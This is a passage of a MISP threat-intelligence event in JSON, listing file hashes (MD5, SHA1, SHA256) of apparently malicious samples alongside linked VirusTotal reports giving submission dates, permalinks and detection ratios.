"uuid" : "44cffa81-e17b-4721-97d0-ba17f13dbdb8" ,
"value" : "32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "67696428-f0ea-4068-b00a-f669ee50ae03" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "16887f29-8d0c-46bd-a5ba-43b819d1b5f3" ,
"value" : "2019-04-06T09:09:47"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "08a55fac-9627-496d-b5f1-d2fff1469956" ,
"value" : "https://www.virustotal.com/file/32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3/analysis/1554541787/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "1ad4c142-b928-4b40-954b-ed89873761fa" ,
"value" : "35/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "45275180-143d-4606-9cd3-6bc35646d412" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "45275180-143d-4606-9cd3-6bc35646d412" ,
"referenced_uuid" : "5a3041a4-6ba6-4ce5-8d08-59693a3c3703" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-d8e8-40a7-95c0-4f6b02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "9a33a2c4-25a7-4482-b5a5-00072f8e46e4" ,
"value" : "5a56f0b53d7639c3775b41de95b4902e"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "6b191b84-dc39-4537-b012-8b6dce7695ad" ,
"value" : "18f0a1a2f448d2a5824566a080b32f5d5f291075"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "582b2349-c7ce-45f4-afcb-595f2fe6bd14" ,
"value" : "34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "5a3041a4-6ba6-4ce5-8d08-59693a3c3703" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "28219f45-de8f-443f-95ea-f953b32ab42c" ,
"value" : "2019-04-14T04:38:58"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "9e8d82d4-4886-40e5-b15c-c1f75bb6e0ad" ,
"value" : "https://www.virustotal.com/file/34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe/analysis/1555216738/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "eb4ad240-1687-479f-9ae9-55f16edf0601" ,
"value" : "36/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "56c96c2d-6b60-480a-a6dd-392718a6b188" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "56c96c2d-6b60-480a-a6dd-392718a6b188" ,
"referenced_uuid" : "b5470b5b-e9e6-4ed2-b7c3-108f1e42b227" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-6564-4e23-ba8a-4c0b02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "79ac497f-101f-4fd9-ace8-a2652857be3e" ,
"value" : "3a3f7b2c2bea6a70ad62657b8613b1d1"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "2191451a-62f1-42dc-831e-0df40000465d" ,
"value" : "ca94cde61c2b1640a420c61d2cb9c892b81a30d1"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "e9aca1fc-4843-4c31-90d6-34b75852895f" ,
"value" : "976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "b5470b5b-e9e6-4ed2-b7c3-108f1e42b227" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "605f81fb-6364-412b-a106-39603b9c4e59" ,
"value" : "2019-04-07T17:10:08"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "5990199c-faff-4903-808a-bdbba9f7276a" ,
"value" : "https://www.virustotal.com/file/976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c/analysis/1554657008/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "f678d42e-bf7a-46c0-af36-7e8b82a6f280" ,
"value" : "36/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "548d726e-92df-4311-b2d7-ea098d9a2570" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "548d726e-92df-4311-b2d7-ea098d9a2570" ,
"referenced_uuid" : "d2a962b8-e9f1-4db3-a4ab-cc399560f5cd" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-2b4c-4582-af93-4b1002de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "dced0977-9785-4cfd-8995-243b3df48320" ,
"value" : "fad9b9a909688f800606c2148b4d0880"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "f42ee720-2c78-46a7-9c94-94ccddc0810e" ,
"value" : "ee44b722df537d53a3e59db178e2be57d7f8e985"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "85f40f04-bfc0-404b-8acb-d37974a6b0a4" ,
"value" : "62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355094" ,
"uuid" : "d2a962b8-e9f1-4db3-a4ab-cc399560f5cd" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "a8e523dd-5dd6-466e-86ce-5b009edd7294" ,
"value" : "2018-12-23T16:55:04"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "ce52ccac-75fd-4d28-8300-23b0f0c2682d" ,
"value" : "https://www.virustotal.com/file/62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d/analysis/1545584104/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "dfb31056-0eac-493e-a0cd-66b3ed501c0c" ,
"value" : "26/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355094" ,
"uuid" : "06546ec0-783e-40a7-a681-d2d25f245cf8" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "06546ec0-783e-40a7-a681-d2d25f245cf8" ,
"referenced_uuid" : "5473bd03-6e2e-435d-b979-cca55055af85" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-e6a8-4b52-a9c3-434f02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "2a08c724-0a62-43b6-a0c8-e683cd72e372" ,
"value" : "f0cccfa07427442b472a15232765a2eb"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "fad14535-f8fb-4ff8-bceb-c550a1186f85" ,
"value" : "6cb397aab13cdcbf0c77aea28431d81b036648ad"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "275c6417-75b4-476b-8fa7-b0fa6e6a555b" ,
"value" : "31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355094" ,
"uuid" : "5473bd03-6e2e-435d-b979-cca55055af85" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "e04d799d-8aaf-4a26-88a6-8836e6095eae" ,
"value" : "2019-04-07T05:08:51"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "d9a1cabf-9dfb-4064-a87b-36e6bf32137f" ,
"value" : "https://www.virustotal.com/file/31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756/analysis/1554613731/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "41d13690-0b80-401c-bff5-a3a4142fced8" ,
"value" : "34/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355094" ,
"uuid" : "2f932e33-d889-4470-9aca-8ffd5769e055" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "2f932e33-d889-4470-9aca-8ffd5769e055" ,
"referenced_uuid" : "66a53076-8934-43d7-b983-ab73ddd29d99" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-24e0-4f30-afd3-48be02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "0cd432b8-7fe1-49b8-9898-03722b94b8de" ,
"value" : "dccb186234326d4bff449d4416ff6ce4"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "581bbd4b-b27a-436a-a84a-6f147701df1e" ,
"value" : "a787e2e2f2bcfef92aa5032a67f3e6efcd706cb2"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "3fa54938-bbaf-4732-9e41-f1d49559710c" ,
"value" : "f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355095" ,
"uuid" : "66a53076-8934-43d7-b983-ab73ddd29d99" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "9075c263-e538-4257-af4a-94d66a3923da" ,
"value" : "2019-04-07T05:08:46"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "f433ead2-68ba-47c2-a043-af1ae435ca12" ,
"value" : "https://www.virustotal.com/file/f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221/analysis/1554613726/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "ef17cbe3-8b76-4c29-9210-248ede7d0e42" ,
"value" : "36/55"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355095" ,
"uuid" : "952c0e2d-e595-4f12-a5d4-25ec983c91b6" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "952c0e2d-e595-4f12-a5d4-25ec983c91b6" ,
"referenced_uuid" : "d4872fd8-7dc8-47d3-85e7-6e5aebe63db6" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-1688-4aa0-9e8e-428c02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "7b1f1da1-ffe6-4d49-9957-f84457cac77f" ,
"value" : "b94b6857ed382b66cdfbead83480ee15"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "fd6d3582-48e3-4191-8643-b72fd52eab74" ,
"value" : "b22e1b7bf6de3fb7572b26c10300309b04efb1b8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "6e7ff56c-517b-40b3-9c27-bf128f5b63e3" ,
"value" : "fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355095" ,
"uuid" : "d4872fd8-7dc8-47d3-85e7-6e5aebe63db6" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "99e029db-2803-42d1-97b7-cdd070ac880b" ,
"value" : "2019-04-14T08:40:00"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "82dfb261-8353-453a-8fc5-3ec3f9129822" ,
"value" : "https://www.virustotal.com/file/fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5/analysis/1555231200/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "9b8befa3-84b0-4042-8ddd-86b454ceae2a" ,
"value" : "36/59"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355095" ,
"uuid" : "1823da6d-442b-46cf-806d-aac97de195a4" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "1823da6d-442b-46cf-806d-aac97de195a4" ,
"referenced_uuid" : "b5d7ba31-66eb-4bc9-a2c8-5140d36761b8" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-a3cc-4b0f-a3ef-4c1302de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "28708c12-f4c7-4de5-b038-e274224d52da" ,
"value" : "b83113015a0f817c4d68659d9a1e370a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "5a5c76ee-7d95-452f-a5b2-2ff5dbdd673e" ,
"value" : "ec9c669f2b8c13e94a7ba7c57ccf163c8b8cf060"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "70737086-ac37-4fea-a227-f5ce2ff25e22" ,
"value" : "3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355095" ,
"uuid" : "b5d7ba31-66eb-4bc9-a2c8-5140d36761b8" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "211d0bff-f499-4d9f-9b51-f35b3784bc4b" ,
"value" : "2019-03-15T21:23:14"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "bd823c0f-8191-4313-a833-5193229cf518" ,
"value" : "https://www.virustotal.com/file/3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f/analysis/1552684994/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "92028634-4567-407b-9470-2c3b3295062c" ,
"value" : "6/55"
}
]
}
]
}
}